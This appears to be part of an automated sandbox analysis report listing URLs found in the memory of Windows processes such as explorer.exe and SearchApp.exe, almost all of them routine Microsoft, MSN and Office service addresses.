        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark
        Source: msedge.exe.6.drString found in binary or memory: https://crashpad.chromium.org/
        Source: msedge.exe.6.drString found in binary or memory: https://crashpad.chromium.org/bug/new
        Source: msedge.exe.6.drString found in binary or memory: https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B9627F8000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1676939865.000001B962800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://da.xboxservices.com/DigitalAttachmentFD/AttachmentRecords
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
        Source: StartMenuExperienceHost.exe, 0000001D.00000000.1504669127.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.comp
        Source: SearchApp.exe, 0000001F.00000000.1571507511.000001D61CE00000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfills
        Source: SearchApp.exe, 0000001F.00000000.1554248946.000001D61A4A0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fb.me/react-polyfillsThis
        Source: SearchApp.exe, 0000001F.00000000.1556526084.000001D61A800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/api/v1/configuration/cortana
        Source: SearchApp.exe, 0000001F.00000000.1554332947.000001D61A4C0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://gcchigh.loki.office365.us/apihttps://msit.loki.delve.office.com/apihttps://gcc.loki.delve.of
        Source: msedge.exe.6.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ff
        Source: msedge.exe.6.drString found in binary or memory: https://github.com/pq-crystals/kyber/commit/28413dfbf523fdde181246451c2bd77199c0f7ffDilithium2Dilith
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
        Source: SearchApp.exe, 0000001F.00000000.1574349980.000001D61D038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
        Source: SearchApp.exe, 0000001F.00000000.1595795539.000001D62DDC4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/https://substrate.office.comWsbVerifyAccountRequired
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
        Source: explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1eBTmz.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AATs0AB.img
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1e6XdQ.img
        Source: WinStore.App.exe, 00000024.00000000.1676939865.000001B9627F8000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1676939865.000001B962800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://live.xbox.com/purchase/xbox/
        Source: YMZwp.exe, 00000009.00000003.1304793378.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp, YMZwp.exe, 00000009.00000002.1358038153.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1568130646.000001D61C6EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1568130646.000001D61C6EE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1559347123.000001D61AD95000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local
        Source: svchost.exe, 00000017.00000000.1450773187.000001697A665000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1559347123.000001D61AD95000.00000004.00000001.00020000.00000000.sdmp, WinStore.App.exe, 00000024.00000000.1674183979.000001B901E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.local/
        Source: WinStore.App.exe, 00000024.00000000.1674183979.000001B901E02000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.localhttps://login.windows.local
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1550771232.000001D619B3D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net
        Source: svchost.exe, 00000017.00000000.1450927769.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1550771232.000001D619B3D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://login.windows.net/
        Source: SearchApp.exe, 0000001F.00000000.1558233883.000001D61AC39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delv
        Source: SearchApp.exe, 0000001F.00000000.1552848561.000001D61A247000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api
        Source: SearchApp.exe, 0000001F.00000000.1556526084.000001D61A800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/cortana
        Source: SearchApp.exe, 0000001F.00000000.1570461820.000001D61CBC6000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1570461820.000001D61CBBB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1570744260.000001D61CC00000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1543905322.000001CE197BE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://mths.be/fromcodepoint
        Source: SearchApp.exe, 0000001F.00000000.1592816727.000001D62DC41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/web-widget?form=M
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
        Source: StartMenuExperienceHost.exe, 0000001D.00000000.1504669127.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.comx
        Source: SearchApp.exe, 0000001F.00000000.1596602105.000001D62DEED000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/owahttps://outlook.office.com/owaCodexChatButtonUpperRight
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1589412023.000001D62DAA5000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1554869750.000001D61A56B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1554904383.000001D61A577000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access
        Source: SearchApp.exe, 0000001F.00000000.1593174717.000001D62DC64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.Access9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7394866fc-eedb-4f01-8536-3f
        Source: SearchApp.exe, 0000001F.00000000.1569853933.000001D61CA00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/M365.AccessZ
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1561018737.000001D61AFAA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1589775748.000001D62DAB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWrite
        Source: SearchApp.exe, 0000001F.00000000.1595191895.000001D62DDAB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office.com/User.ReadWritehttps://substrate.office.com/M365.AccessZ
        Source: SearchApp.exe, 0000001F.00000000.1573700560.000001D61CFCA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/
        Source: SearchApp.exe, 0000001F.00000000.1556526084.000001D61A800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.office365.com/mail/deeplink/attachment/
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://parade.com/61481/toriavey/where-did-hamburgers-originate
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000001D.00000000.1504669127.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
        Source: SearchApp.exe, 0000001F.00000000.1569853933.000001D61CA00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://rafd.https://raka.https://rcf.aRmsDeferhttps://r.fRmsDefer
        Source: SearchApp.exe, 0000001F.00000000.1571507511.000001D61CE00000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
        Source: StartMenuExperienceHost.exe, 0000001D.00000000.1516914446.00000273DB117000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ris.api.iris.
        Source: SearchApp.exe, 0000001F.00000000.1567712885.000001D61C60E000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1617051808.000001D6307D0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1563305056.000001D61C0A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/
        Source: SearchApp.exe, 0000001F.00000000.1570791530.000001D61CC23000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1572859611.000001D61CF64000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1576617561.000001D62D490000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1601325846.000001D62E02A000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1574349980.000001D61D038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com
        Source: SearchApp.exe, 0000001F.00000000.1600996499.000001D62E006000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/M365.Access.
        Source: SearchApp.exe, 0000001F.00000000.1556788501.000001D61A860000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
        Source: SearchApp.exe, 0000001F.00000000.1595795539.000001D62DDD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1589775748.000001D62DAB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/api/v2.0/Users(
        Source: SearchApp.exe, 0000001F.00000000.1573738956.000001D61CFD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/dsapi/v1.0/
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/
        Source: SearchApp.exe, 0000001F.00000000.1588760995.000001D62DA13000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/imageB2/v1.0/users/1
        Source: SearchApp.exe, 0000001F.00000000.1556526084.000001D61A800000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/events?scenario=5
        Source: SearchApp.exe, 0000001F.00000000.1554381094.000001D61A4E3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.com/search/api1f8c91c6-235c-4050-8639-720df71e4e93d0438cf5-4bd5-480a-aeab-0
        Source: SearchApp.exe, 0000001F.00000000.1605415996.000001D62E0C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office.comRemovingScopeNarratorText2
        Source: SearchApp.exe, 0000001F.00000000.1573738956.000001D61CFD0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1589775748.000001D62DAB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/api/v2.0/Users(
        Source: SearchApp.exe, 0000001F.00000000.1543825269.000001CE1977D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/imageB2/v1.0/users/
        Source: SearchApp.exe, 0000001F.00000000.1556603562.000001D61A820000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://substrate.office365.us/search/api/v2/queryhttps://substrate.office.com/search/api/v2/query
        Source: smartscreen.exe, 00000022.00000003.2426909709.0000014226C27000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates1.ss.wd.microsoft.us
        Source: smartscreen.exe, 00000022.00000003.2426909709.0000014226C27000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates2.ss.wd.microsoft.us
        Source: smartscreen.exe, 00000022.00000003.2426909709.0000014226C27000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
        Source: SearchApp.exe, 0000001F.00000000.1558233883.000001D61AC39000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://usgovhigh.business.bi
        Source: SearchApp.exe, 0000001F.00000000.1534192667.000001CE12200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
        Source: SearchApp.exe, 0000001F.00000000.1534192667.000001CE12200000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000001B.00000003.2291978153.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.4124666902.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1479087951.000000000899E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/bat
        Source: explorer.exe, 0000001B.00000003.2293165397.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.1482824632.000000000BDC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
        Source: StartMenuExperienceHost.exe, 0000001D.00000000.1504669127.00000273D826E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.coms
        Source: SearchApp.exe, 0000001F.00000000.1593174717.000001D62DC64000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.www.bing.www.yandex.google
        Source: SearchApp.exe, 0000001F.00000000.1570875044.000001D61CCDD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
        Source: SearchApp.exe, 0000001F.00000000.1555856407.000001D61A6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz&quot;
        Source: SearchApp.exe, 0000001F.00000000.1584377831.000001D62D7DD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/basketball-frvr/cg-9npd4c9369l0https://www.msn.com/de-ch/play/g
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1563305056.000001D61C0A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
        Source: SearchApp.exe, 0000001F.00000000.1555856407.000001D61A6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31&quot;
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bricks-breaker-deluxe-crusher/cg-9nnjfbfrzq3j&quot;
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1563305056.000001D61C0A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1555856407.000001D61A6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w&quot;
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1563305056.000001D61C0A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
        Source: SearchApp.exe, 0000001F.00000000.1555856407.000001D61A6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817&quot;
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-checkers-multiplayer/cg-9p3c5sx31v9k&quot;
        Source: SearchApp.exe, 0000001F.00000000.1555536007.000001D61A600000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001F.00000000.1563305056.000001D61C0A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
        Source: SearchApp.exe, 0000001F.00000000.1555856407.000001D61A6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1&quot;
        Source: SearchApp.exe, 0000001F.00000000.1555856407.000001D61A6C6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&amp;cgfrom=cg_dsb_seeMore&quot;
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/companies/kaiser-permanente-and-unions-for-75-000-striking-health-wo
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
        Source: explorer.exe, 0000001B.00000000.1473435929.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.3922456855.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.2296446015.0000000007065000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
